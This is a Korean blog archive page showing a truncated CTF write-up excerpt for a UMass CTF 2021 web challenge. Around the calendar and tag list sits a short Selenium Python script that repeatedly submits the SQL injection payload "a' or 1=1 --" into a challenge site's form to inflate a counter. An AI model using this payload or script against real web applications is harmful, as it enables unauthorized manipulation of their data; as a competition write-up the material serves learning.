Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | ||||
4 | 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 | 13 | 14 | 15 | 16 | 17 |
18 | 19 | 20 | 21 | 22 | 23 | 24 |
25 | 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 라이트업
- reversing
- 코드엔진
- 라이트 업
- 강의
- 변수
- probgame
- ctf
- 라업
- reversing.kr
- c언어
- 2021
- 풀이
- Basic
- 파이썬
- hackingcamp
- 리버스 엔지니어링
- web
- PYTHON
- 드림핵
- 해킹캠프
- vsCode
- write-up
- 히공
- ShaktiCTF
- 리버싱
- 시탭
- 뭉뭉
- 워 게임
- write up
Archives
목록웹 해킹 (1)
히공

문제 이런 사이트다. sql injection으로 count를 올릴 수 있다. from selenium import webdriver url = "http://34.121.84.161:8084/" driver = webdriver.Chrome('chromedriver.exe') driver.get(url=url) driver.implicitly_wait(5) for i in range(500): driver.find_element_by_xpath('//*[@id="guess"]').send_keys("a' or 1=1 --") driver.find_element_by_xpath('/html/body/section/form/input[2]').click() input() 셀레니움으로 빨리 풀 수 있었다. ..
write up/UMass CTF 2021
2021. 3. 30. 17:53